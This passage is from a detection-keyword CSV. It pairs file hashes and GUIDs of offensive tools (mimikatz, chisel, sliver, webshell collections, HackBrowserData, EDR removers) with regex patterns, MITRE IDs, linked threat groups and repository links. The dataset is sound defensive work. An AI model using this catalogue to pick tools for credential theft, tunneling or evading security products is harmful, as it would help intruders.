EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20855" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20856" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20857" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20858" "*02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e*",".{0,1000}02f6a2640616568c5b0f581b1902ebb7be15b6368a2c69ab7f3014754d88b51e.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts 
suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20859" "*02f70aded03c76e395624ff19b9f2483b4cc88309d82ca2b5777daa3a5563887*",".{0,1000}02f70aded03c76e395624ff19b9f2483b4cc88309d82ca2b5777daa3a5563887.{0,1000}","offensive_tool_keyword","ligolo-ng","An advanced tunneling tool that uses TUN interfaces","T1572 - T1090","TA0011","N/A","Dispossessor - AvosLocker - LockBit","C2","https://github.com/nicocha30/ligolo-ng","1","0","#filehash","N/A","10","10","3380","338","2025-04-17T07:48:36Z","2021-07-28T12:55:36Z","20860" "*02FAF312-BF2A-466B-8AD2-1339A31C303B*",".{0,1000}02FAF312\-BF2A\-466B\-8AD2\-1339A31C303B.{0,1000}","offensive_tool_keyword","clickjack","automate abuse of clickonce applications","T1210 - T1204 - T1071.001","TA0001 - TA0002 - TA0005","N/A","N/A","Phishing","https://github.com/trustedsec/The_Shelf","1","0","#GUIDproject","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20861" "*02fef76d10ce6799f315ed249098a327b978b8967474a2ad03b5c359b5738237*",".{0,1000}02fef76d10ce6799f315ed249098a327b978b8967474a2ad03b5c359b5738237.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","20862" "*03008e06f61a8a9404a216695d55edf3ee6f021231069968dd08de1a492030ab*",".{0,1000}03008e06f61a8a9404a216695d55edf3ee6f021231069968dd08de1a492030ab.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense 
Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","20863" "*030cc05376c7c249583648d5324f8d2bad47ea9af1a4f1a751a09db700eb5817*",".{0,1000}030cc05376c7c249583648d5324f8d2bad47ea9af1a4f1a751a09db700eb5817.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20866" "*030d5d76052e0da4488b216db816fd13bdaf25e047f0b34820a2b55305f9fd8c*",".{0,1000}030d5d76052e0da4488b216db816fd13bdaf25e047f0b34820a2b55305f9fd8c.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20867" "*030d68dfcc676b9d13c5cc954bf576d0ab617c972c93b21b838637548d697b79*",".{0,1000}030d68dfcc676b9d13c5cc954bf576d0ab617c972c93b21b838637548d697b79.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20868" "*0313676f45763c5b4e90928b7f9d357253db656f86f8326420f51bbb9fde9238*",".{0,1000}0313676f45763c5b4e90928b7f9d357253db656f86f8326420f51bbb9fde9238.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - 
Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20870" "*0316bec32da4114fafd515553b7e928c1a62efebbe5ec57842d17b63beed58df*",".{0,1000}0316bec32da4114fafd515553b7e928c1a62efebbe5ec57842d17b63beed58df.{0,1000}","offensive_tool_keyword","ShareAudit","A tool for auditing network shares in an Active Directory environment","T1135 - T1005 - T1083 - T1210","TA0007 - TA0009","N/A","N/A","Discovery","https://github.com/dionach/ShareAudit","1","0","#filehash","N/A","8","1","42","15","2019-04-29T10:07:57Z","2019-02-26T16:00:15Z","20872" "*031c6896d87b890a2cd54948297d5d804a5e3b52a067a81b7dd12c1c4ad77496*",".{0,1000}031c6896d87b890a2cd54948297d5d804a5e3b52a067a81b7dd12c1c4ad77496.{0,1000}","offensive_tool_keyword","reverse-ssh","Statically-linked ssh server with reverse shell functionality for CTFs and such","T1105 - T1572 - T1569.002 - T1090","TA0001 - TA0002 - TA0003 - TA0010 - TA0011 - TA0005 ","N/A","N/A","C2","https://github.com/Fahrj/reverse-ssh","1","0","#filehash","N/A","10","10","961","141","2023-02-15T00:16:25Z","2021-07-12T18:26:29Z","20873" "*031d71c5e90e9efeecb4a1163846c69ef42e8af0f0945914b079b58f6da038c8*",".{0,1000}031d71c5e90e9efeecb4a1163846c69ef42e8af0f0945914b079b58f6da038c8.{0,1000}","offensive_tool_keyword","nps","chinese intranet penetration proxy server","T1090 - T1071 - T1102 - T1075 - T1133","TA0002 - TA0011 - TA0010","N/A","N/A","Defense Evasion","https://github.com/yisier/nps","1","0","#filehash","N/A","9","10","2674","327","2025-04-17T09:43:50Z","2022-09-14T06:24:00Z","20875" "*0320ac39c0f62ed4b850c09e6cad3c7af53ed5ffbf48b1421ca6d4510c9a35ae*",".{0,1000}0320ac39c0f62ed4b850c09e6cad3c7af53ed5ffbf48b1421ca6d4510c9a35ae.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20876" "*0322cddf469dfbc17a818a30fb9eb4704a7217a62a8e5f7dc45ab3c89ab7dffe*",".{0,1000}0322cddf469dfbc17a818a30fb9eb4704a7217a62a8e5f7dc45ab3c89ab7dffe.{0,1000}","offensive_tool_keyword","chisel","A fast TCP/UDP tunnel over HTTP","T1090 - T1090.003 - T1572 - T1572.001","TA0042 - TA0011","N/A","BlackSuit - Royal - AvosLocker - Cactus - Yanluowang - Sandworm - KNOTWEED","C2","https://github.com/jpillora/chisel","1","0","#filehash #linux #windows","N/A","10","10","14432","1466","2024-09-28T23:35:13Z","2015-02-25T11:42:50Z","20877" "*03269801085da5702202a4d2cd0f006bf93e63b6da69c588414380cdf3753349*",".{0,1000}03269801085da5702202a4d2cd0f006bf93e63b6da69c588414380cdf3753349.{0,1000}","offensive_tool_keyword","Invoke-ArgFuscator","generate obfuscated command-lines for common system-native executables","T1027 - T1059 - T1202","TA0005 - TA0002","N/A","N/A","Defense Evasion","https://github.com/wietze/Invoke-ArgFuscator","1","0","#filehash","N/A","10","2","161","28","2025-04-14T21:24:29Z","2022-11-20T17:59:23Z","20878" "*032bf57408a5cc20cb45e19dc494fa0ee9dcd3b70b0c606698dd9af4e689268b*",".{0,1000}032bf57408a5cc20cb45e19dc494fa0ee9dcd3b70b0c606698dd9af4e689268b.{0,1000}","offensive_tool_keyword","Dispossessor","script used to install anydesk by the Dispossessor group","T1486 - T1490 - T1059 - T1213 - T1078","TA0040 - TA0043 - TA0001 - TA0009","N/A","Dispossessor","Persistence","https://vx-underground.org/Archive/Dispossessor%20Leaks","1","0","N/A","N/A","10","10","N/A","N/A","N/A","N/A","20879" "*032df02a828c74567c4659feb4fd6644726265e0f26456c467f46434923399ca*",".{0,1000}032df02a828c74567c4659feb4fd6644726265e0f26456c467f46434923399ca.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - 
T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20880" "*032df02a828c74567c4659feb4fd6644726265e0f26456c467f46434923399ca*",".{0,1000}032df02a828c74567c4659feb4fd6644726265e0f26456c467f46434923399ca.{0,1000}","offensive_tool_keyword","mimikatz","mimikatz archives hashes","T1134.005 - T1098 - T1547.005 - T1555 - T1555.003 - T1555.004 - T1003.001 - T1003.002 - T1003.004 - T1003.006 - T1207 - T1649 - T1558.001 - T1558.002 - T1552.004 - T1550.002 - T1550.003","TA0004 - TA0006 - TA0003 - TA0008 - TA0009","N/A","Black Basta - APT1 - APT24 - APT28 - APT29 - APT32 - APT33 - APT38 - APT39 - APT41 - APT5 - Akira - Avivore - BERSERK BEAR - BOSS SPIDER - BRONZE BUTLER - BackdoorDiplomacy - Blue Mockingbird - CHRYSENE - COZY BEAR - Carbanak - Chamelgang - Chimera - Cleaver - Cobalt Group - DarkHydrus - Dragonfly - Earth Lusca - FANCY BEAR - FIN13 - FIN6 - FIN7 - GALLIUM - Gamaredon - HEXANE - Indrik Spider - Ke3chang - Kimsuky - LAPSUS$ - Leafminer - Magic Hound - MuddyWater - OilRig - PittyTiger - Sandworm Team - Scattered Spider - TA505 - TEMP.Veles - Threat 
Group-3390 - Thrip - Tonto Team - Turla - Unit 29155 - Volt Typhoon - Whitefly - Wizard Spider - menuPass - Dispossessor - DragonForce - Sphinx","Credential Access","https://github.com/gentilkiwi/mimikatz","1","0","#filehash","N/A","10","10","20094","3854","2024-07-05T17:42:58Z","2014-04-06T18:30:02Z","20881" "*03395acb8e89d081c82626cd1a91aa654c0a3b05c237632d546aa594fc207fff*",".{0,1000}03395acb8e89d081c82626cd1a91aa654c0a3b05c237632d546aa594fc207fff.{0,1000}","offensive_tool_keyword","Amass","The OWASP Amass Project performs network mapping of attack surfaces and external asset discovery using open source information gathering and active reconnaissance techniques.","T1595 - T1596 - T1018 - T1482","TA0007 - TA0043 - ","N/A","EMBER BEAR","Reconnaissance","https://github.com/caffix/amass","1","0","#filehash #linux","N/A","5","","N/A","","","","20882" "*033ac18935c14c208d6caf86bcb38ea0422f1ace50be938e56d00a480b8e5611*",".{0,1000}033ac18935c14c208d6caf86bcb38ea0422f1ace50be938e56d00a480b8e5611.{0,1000}","offensive_tool_keyword","sliver","Sliver is an open source cross-platform adversary emulation/red team framework","T1105 - T1071.004 - T1021 - T1573.001 - T1132 - T1095 - T1041 - T1074.002 - T1568.002 - T1204 - T1055.012","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0010 - TA0011 - TA0040 - TA0042 - TA0043","N/A","AvosLocker - APT29 - Cinnamon Tempest - GOLD CABIN - COZY BEAR - Black Basta","C2","https://github.com/BishopFox/sliver","1","0","#filehash","N/A","10","10","9218","1249","2025-04-21T17:52:43Z","2019-01-17T22:07:38Z","20883" "*033c90882b07aaa708b6ab9f04202ed0d01a0599419538862ae2b5653e689316*",".{0,1000}033c90882b07aaa708b6ab9f04202ed0d01a0599419538862ae2b5653e689316.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - 
TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20884" "*034B1C28-96B9-486A-B238-9C651EAA32CA*",".{0,1000}034B1C28\-96B9\-486A\-B238\-9C651EAA32CA.{0,1000}","offensive_tool_keyword","ConfuserEx","ConfuserEx is a widely used open source obfuscator often found in malware","T1027 - T1045","TA0005 ","N/A","N/A","Defense Evasion","https://github.com/yck1509/ConfuserEx","1","0","#GUIDproject","N/A","6","10","3629","1661","2019-05-14T14:23:56Z","2014-03-28T07:00:26Z","20886" "*0354365922cdfd77a8ef7f7fc3b1f757b7ba4a94cc2561875b766f178003f5c1*",".{0,1000}0354365922cdfd77a8ef7f7fc3b1f757b7ba4a94cc2561875b766f178003f5c1.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20887" "*03600de62239db741db7a1d072a4e8504c25b64b7d398d5c80d467452aefbfad*",".{0,1000}03600de62239db741db7a1d072a4e8504c25b64b7d398d5c80d467452aefbfad.{0,1000}","offensive_tool_keyword","sharpcollection","Nightly builds of common C# offensive tools. 
fresh from their respective master branches built and released in a CDI fashion using Azure DevOps release pipelines.","T1059 - T1027 - T1036 - T1562 - T1045 - T1024 - T1070 - T1574 - T1071 - T1078 - T1003 - T1072 - T1075 - T1077 - T1079 - T1083 - T1105 - T1106 - T1120 - T1135 - T1158 - T1204 - T1214 - T1215 - T1220 - T1221 - T1222 - T1223 - T1224 - T1227 - T1247 - T12","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0010 - TA0011","N/A","Black Basta","Exploitation tool","https://github.com/Flangvik/SharpCollection","1","0","#filehash","N/A","10","10","2452","358","2025-04-18T03:38:55Z","2020-06-05T12:50:00Z","20890" "*03652836-898E-4A9F-B781-B7D86E750F60*",".{0,1000}03652836\-898E\-4A9F\-B781\-B7D86E750F60.{0,1000}","offensive_tool_keyword","SharpSCCM","SharpSCCM is a post-exploitation tool designed to leverage Microsoft Endpoint Configuration Manager (a.k.a. ConfigMgr. formerly SCCM) for Lateral Movement and credential gathering without requiring access to the SCCM administration console GUI","T1078 - T1077 - T1547.001 - T1021.001 - T1087 - T1555.003","TA0008 - TA0006 - TA0003 - TA0011","N/A","N/A","Lateral Movement","https://github.com/Mayyhem/SharpSCCM/","1","0","#GUIDproject","N/A","10","7","626","94","2024-09-16T14:57:49Z","2021-08-19T05:09:19Z","20891" "*0365439c99fbf26126da61350ad8c424c6c0064c7cb3a9d2bc0b56674b01ed7c*",".{0,1000}0365439c99fbf26126da61350ad8c424c6c0064c7cb3a9d2bc0b56674b01ed7c.{0,1000}","offensive_tool_keyword","macro_pack","The macro_pack is a tool used to automatize obfuscation and generation of retro formats such as MS Office documents or VBS like format. 
Now it also handles various shortcuts formats.","T1587 - T1588 - T1027 - T1204 ","TA0005 - TA0002 - TA0008 - TA0011 - TA0042","N/A","Black Basta","Resource Development","https://github.com/sevagas/macro_pack","1","0","#filehash","N/A","10","10","2241","412","2024-08-15T14:21:39Z","2017-10-03T18:30:06Z","20892" "*036b5e87804f5996d8009b8d06f95a307227c6835a51ce64427cae7189cf86d2*",".{0,1000}036b5e87804f5996d8009b8d06f95a307227c6835a51ce64427cae7189cf86d2.{0,1000}","offensive_tool_keyword","ShimMe","Injects a DLL into a suspended process running as SYSTEM via the OfficeClickToRun service for privilege escalation - Shim Injector: Injects a DLL into a process by modifying shim data in memory without creating or registering new SDB files to evade detection.","T1055 - T1053 - T1548.002 - T1078 - T1546 - T1070","TA0004 - TA0005 - TA0006 - TA0009","N/A","N/A","Privilege Escalation","https://github.com/deepinstinct/ShimMe","1","0","#filehash","N/A","9","2","140","20","2024-10-29T07:33:38Z","2024-08-04T10:03:28Z","20894" "*036f633201389badc16397101c718b3b6dea0ef726171e0448157129faa389b9*",".{0,1000}036f633201389badc16397101c718b3b6dea0ef726171e0448157129faa389b9.{0,1000}","offensive_tool_keyword","HackBrowserData","Decrypt passwords/cookies/history/bookmarks from the browser","T1555.003 - T1552.001","TA0006 - TA0009 - TA0010","N/A","N/A","Credential Access","https://github.com/moonD4rk/HackBrowserData","1","0","#filehash","N/A","N/A","10","12216","1656","2025-04-06T01:32:13Z","2020-06-18T03:24:31Z","20895" "*036fe0cc4697725599694442e4b0a45ff13fb306dc7d36759cdcc4b2d0443104*",".{0,1000}036fe0cc4697725599694442e4b0a45ff13fb306dc7d36759cdcc4b2d0443104.{0,1000}","offensive_tool_keyword","windows-defender-remover","hacktool used to remove Windows Defender","T1089 - T1562.001 - T1562.004","TA0005 - TA0040","N/A","Black Basta","Defense 
Evasion","https://github.com/ionuttbara/windows-defender-remover","1","0","#filehash","N/A","10","10","5266","354","2025-02-13T20:21:07Z","2021-08-13T20:44:46Z","20896" "*036fedcd8c1d30e41ad0f36aa87f90338b7d1310632c729706d918a34d398eb5*",".{0,1000}036fedcd8c1d30e41ad0f36aa87f90338b7d1310632c729706d918a34d398eb5.{0,1000}","offensive_tool_keyword","EDRPrison","Leverage a legitimate WFP callout driver to prevent EDR agents from sending telemetry","T1562 - T1027","TA0005 - TA0007","N/A","N/A","Defense Evasion","https://github.com/senzee1984/EDRPrison","1","0","#filehash","N/A","10","5","401","37","2024-08-02T18:10:02Z","2024-06-30T01:17:04Z","20897" "*037abc006fd6d9877d3f63baa4d32ebedd18b5a1ce6f51c22aa0d18c7ad1e352*",".{0,1000}037abc006fd6d9877d3f63baa4d32ebedd18b5a1ce6f51c22aa0d18c7ad1e352.{0,1000}","offensive_tool_keyword","LdapRelayScan","Check for LDAP protections regarding the relay of NTLM authentication","T1557","TA0001 - TA0006","N/A","N/A","Reconnaissance","https://github.com/zyn3rgy/LdapRelayScan","1","0","#filehash","N/A","8","5","492","70","2024-11-19T21:11:53Z","2022-01-16T06:50:44Z","20898" "*037be685f55c58fdbb54ccbff3829e4de62d73174cc2a25339b047515877f1b9*",".{0,1000}037be685f55c58fdbb54ccbff3829e4de62d73174cc2a25339b047515877f1b9.{0,1000}","offensive_tool_keyword","pretender","MitM sidekick for relaying attacks featuring DHCPv6 DNS takeover as well as mDNS - LLMNR and NetBIOS-NS spoofing","T1557 - T1046 - T1590 - T1557.002","TA0008 - TA0011 - TA0007 - TA0009","N/A","N/A","Sniffing & Spoofing","https://github.com/RedTeamPentesting/pretender","1","0","#filehash","N/A","7","10","1089","79","2025-02-19T08:14:57Z","2022-07-11T13:23:23Z","20900" "*037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136*",".{0,1000}037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - 
TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","20901" "*037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136*",".{0,1000}037efb13ec86af0dd0aa92bae0e8dbb3d50de958e8936dfeb2938ee3ea4a3136.{0,1000}","offensive_tool_keyword","Sandman","Sandman is a NTP based backdoor for red team engagements in hardened networks.","T1105 - T1027 - T1071.001","TA0011 - TA0005","N/A","N/A","Persistence","https://github.com/Idov31/Sandman","1","0","#filehash","N/A","10","8","785","108","2024-03-31T17:40:15Z","2022-08-21T11:04:45Z","20902" "*037f7348a66495d6502220e15f3766aa070dd12eb40b3d08d3f855c4cd77cf7f*",".{0,1000}037f7348a66495d6502220e15f3766aa070dd12eb40b3d08d3f855c4cd77cf7f.{0,1000}","offensive_tool_keyword","impacketremoteshell","install a legit application and interface with it over smb w/o the signature of cmd.exe / powershell.exe being called or the redirection typically used by those techniques","T1077 - T1059.007 - T1569.001","TA0008 - TA0005 - TA0040","N/A","N/A","Lateral Movement","https://github.com/trustedsec/The_Shelf","1","0","#filehash","N/A","10","3","247","14","2024-11-25T19:33:34Z","2024-05-22T14:31:52Z","20903" "*038fd0cd088e5688b206727b5aa52711a21b929d76a6632b1996af026864790b*",".{0,1000}038fd0cd088e5688b206727b5aa52711a21b929d76a6632b1996af026864790b.{0,1000}","offensive_tool_keyword","tun2socks","socks tunneling","T1572 - T1090 - T1071 - T1573 - T1205","TA0010 - TA0011 - TA0008 - TA0005","N/A","N/A","C2","https://github.com/xjasonlyu/tun2socks","1","0","#filehash","N/A","10","10","3785","513","2025-04-15T21:19:25Z","2019-07-16T03:25:40Z","20906" "*039502d988c5665676f38e37c9ef27969203e4d552bd1f1c732c0c0f4c093016*",".{0,1000}039502d988c5665676f38e37c9ef27969203e4d552bd1f1c732c0c0f4c093016.{0,1000}","offensive_tool_keyword","rotateproxy","A tool that uses fofa to search for socks5 open proxies and perform proxy pool rotation","T1071.001 - 
T1090 - T1095 - T1189","TA0011 - TA0010 - TA0005","N/A","N/A","Defense Evasion","https://github.com/akkuman/rotateproxy","1","0","#filehash","N/A","10","9","800","135","2024-01-24T05:47:37Z","2021-10-18T02:10:27Z","20907" "*03953e4cc4951d88c845e4c14b98f1d886899fd3278c97050be3969144e296e1*",".{0,1000}03953e4cc4951d88c845e4c14b98f1d886899fd3278c97050be3969144e296e1.{0,1000}","offensive_tool_keyword","precompiled-binaries","executables for penetration testing Windows Active Directory environments","T1016 - T1046 - T1087 - T1082 - T1055 - T1068 - T1083 - T1012 - T1558 - T1097 - T1077 - T1134 - T1550 - T1078 - T1021 - T1072 - T1484 - T1553 - T1557 - T1003 - T1555 - T1134 - T1055 - T1088","TA0007 - TA0008 - TA0004 - TA0006 - TA0002 - TA0005","N/A","N/A","Exploitation tool","https://github.com/jakobfriedl/precompiled-binaries","1","0","#filehash","N/A","10","2","138","38","2025-03-06T13:02:11Z","2023-08-08T12:21:46Z","20908" "*03963c5f7fbaf997cc971aa4a2367f68eb694f3cc35fe9408e423f1919c356a1*",".{0,1000}03963c5f7fbaf997cc971aa4a2367f68eb694f3cc35fe9408e423f1919c356a1.{0,1000}","offensive_tool_keyword","AV_Evasion_Tool","Undetectable Payload Generator Tool","T1027 - T1036 - T1059 - T1107","TA0005","N/A","N/A","Defense Evasion","https://github.com/1y0n/AV_Evasion_Tool","1","0","#filehash","N/A","10","10","2680","406","2023-12-08T07:38:06Z","2020-04-24T01:11:09Z","20909" "*03a2655c68c8fba7b1351d8ac272f7d14df5c19ef2aa5ea66515991595babdbc*",".{0,1000}03a2655c68c8fba7b1351d8ac272f7d14df5c19ef2aa5ea66515991595babdbc.{0,1000}","offensive_tool_keyword","reconftw","reconFTW is a tool designed to perform automated recon on a target domain by running the best set of tools to perform scanning and finding out vulnerabilities","T1595 - T1590 - T1592 - T1596 - T1598 - T1046 - T1599 - T1213 - T1597","TA0043 - TA0042 - TA0007 - TA0001","N/A","N/A","Vulnerability Scanner","https://github.com/six2dez/reconftw","1","0","#filehash 
#linux","N/A","7","10","6202","982","2025-04-22T13:01:31Z","2020-12-30T23:52:52Z","20912" "*03a544b51ade8258a377800fda3237ce6f36ebae34e6787380c0a2f341b591e9*",".{0,1000}03a544b51ade8258a377800fda3237ce6f36ebae34e6787380c0a2f341b591e9.{0,1000}","offensive_tool_keyword","ExtPassword.exe","Nirsoft tool for Windows that allows you to recover passwords stored on external drive plugged to your computer","T1081 - T1003 - T1212","TA0006 - TA0009","N/A","LockBit","Credential Access","https://www.nirsoft.net/utils/external_drive_password_recovery.html","1","0","#filehash","N/A","10","10","N/A","N/A","N/A","N/A","20914" "*03b99b08166cc1f4ef733078b9756cd12d39824acd022a2aca1da5f888094538*",".{0,1000}03b99b08166cc1f4ef733078b9756cd12d39824acd022a2aca1da5f888094538.{0,1000}","offensive_tool_keyword","PEASS-ng","PEASS-ng - Privilege Escalation Awesome Scripts suite","T1098","TA0004 - TA0005","N/A","Scattered Spider* - PLAY - EMBER BEAR - COZY BEAR - Dispossessor","Privilege Escalation","https://github.com/peass-ng/PEASS-ng","1","0","#filehash","N/A","10","10","17347","3209","2025-04-01T04:29:00Z","2019-01-13T19:58:24Z","20921" "*03bb58bdb5217b17e37c7c800aeb9505edd2e0f3e2a540a550ae4fccc49b5745*",".{0,1000}03bb58bdb5217b17e37c7c800aeb9505edd2e0f3e2a540a550ae4fccc49b5745.{0,1000}","offensive_tool_keyword","webshell","collection of webshell - observed used by famous webshells","T1100 - T1027 - T1059 - T1105","TA0003 - TA0005 - TA0011 - TA0002","N/A","N/A","C2","https://github.com/tennc/webshell","1","0","#filehash","N/A","9","10","10344","5595","2024-12-24T15:37:05Z","2013-05-23T07:37:56Z","20922" "*03bf355ada5fc5ff405e694df967e893d9db590653fa89c1be81350aceda72d9*",".{0,1000}03bf355ada5fc5ff405e694df967e893d9db590653fa89c1be81350aceda72d9.{0,1000}","offensive_tool_keyword","pyrdp","RDP monster-in-the-middle (mitm) and library for Python with the ability to watch connections live or after the fact","T1550.002 - T1059.006 - T1071.001","TA0002 - TA0010","N/A","N/A","Sniffing & 
Spoofing","https://github.com/GoSecure/pyrdp","1","0","#filehash","can also be used by blueteam as a honeypot","10","10","1663","257","2025-03-13T05:11:26Z","2018-09-07T19:17:41Z","20923" "*03c1585bf3e2e6013e2f8cd34d34eedc9c4195dc72628a779db43cdd16b1a7cc*",".{0,1000}03c1585bf3e2e6013e2f8cd34d34eedc9c4195dc72628a779db43cdd16b1a7cc.{0,1000}","offensive_tool_keyword","PrivFu","perform S4U logon with SeTcbPrivilege","T1134","TA0004","N/A","N/A","Privilege Escalation","https://github.com/daem0nc0re/PrivFu","1","0","#filehash","S4uDelegator","10","9","849","122","2025-01-21T05:22:50Z","2021-12-28T13:14:25Z","20924" "*03c387fcf1090b813124a067e3434845c6242e7d6d4f0a835f78a96d6fb6f731*",".{0,1000}03c387fcf1090b813124a067e3434845c6242e7d6d4f0a835f78a96d6fb6f731.{0,1000}","offensive_tool_keyword","CDK","CDK is an open-sourced container penetration toolkit","T1610 - T1611 - T1203 - T1059.004 - T1564.004","TA0001 - TA0002 - TA0003 - TA0004 - TA0005","N/A","N/A","Persistence","https://github.com/cdk-team/CDK","1","0","#linux #filehash","N/A","9","10","4164","566","2025-03-08T14:00:06Z","2020-11-05T09:18:51Z","20925" 